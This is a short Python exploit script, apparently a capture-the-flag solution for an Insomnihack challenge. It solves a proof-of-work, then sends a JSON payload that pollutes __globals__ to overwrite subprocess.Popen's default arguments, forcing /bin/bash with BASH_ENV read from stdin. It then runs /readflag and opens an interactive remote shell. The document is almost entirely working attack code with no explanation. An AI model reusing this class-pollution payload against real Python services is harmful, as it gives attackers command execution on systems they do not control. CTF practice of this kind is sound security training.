54 lines
1.1 KiB
Python
54 lines
1.1 KiB
Python
from pwn import *
|
|
import socket
|
|
|
|
import json
|
|
|
|
import ppp
|
|
import secrets
|
|
import tqdm
|
|
|
|
popen_defaults = [-1, "/bin/bash", None, None, None, None, True, False,
|
|
None, {"BASH_ENV":"/proc/self/fd/0"}, None, None, 0, True, False, []]
|
|
|
|
for _ in tqdm.trange(50000000):
|
|
nonce = ppp.generate_nonce()
|
|
data = secrets.token_hex(16)
|
|
if ppp.is_valid_proof(data, nonce):
|
|
break
|
|
else:
|
|
raise Exception("oops")
|
|
|
|
hash = hashlib.sha256(f'{data}{nonce}'.encode()).hexdigest()
|
|
|
|
obj = {
|
|
"data": data,
|
|
"nonce": nonce,
|
|
"hash": hash,
|
|
"get_data": {
|
|
"__func__": {
|
|
"__globals__": {
|
|
"subprocess": {
|
|
"Popen": {
|
|
"__init__": {
|
|
"__defaults__": popen_defaults
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
payload = json.dumps(obj)
|
|
|
|
print("running")
|
|
|
|
r = remote("ppp.insomnihack.ch", 12345)
|
|
r.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
|
|
|
|
print(r.recvline())
|
|
r.sendline(payload)
|
|
r.sendline("/readflag Please")
|
|
r.shutdown('send')
|
|
r.interactive()
|